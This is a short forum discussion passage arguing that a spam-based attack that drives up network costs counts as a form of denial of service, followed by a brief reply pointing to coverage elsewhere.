So while the attack doesn't fit into one of the existing categories for DoS attacks, it fits the "denial" part well: they attack the cost of the network (the fact that the spammers themselves will have to pull the plug before the cost explodes IMHO doesn't change that character: there are other DoS attacks out there which effectively work by indirectly forcing the admin to take the machine down herself.)
*network-based in this context doesn't mean "anything coming over a network" here, but "concentrating on denying the network-component of the target system". -
Re:if the server goes down...
security focus has a piece on this too.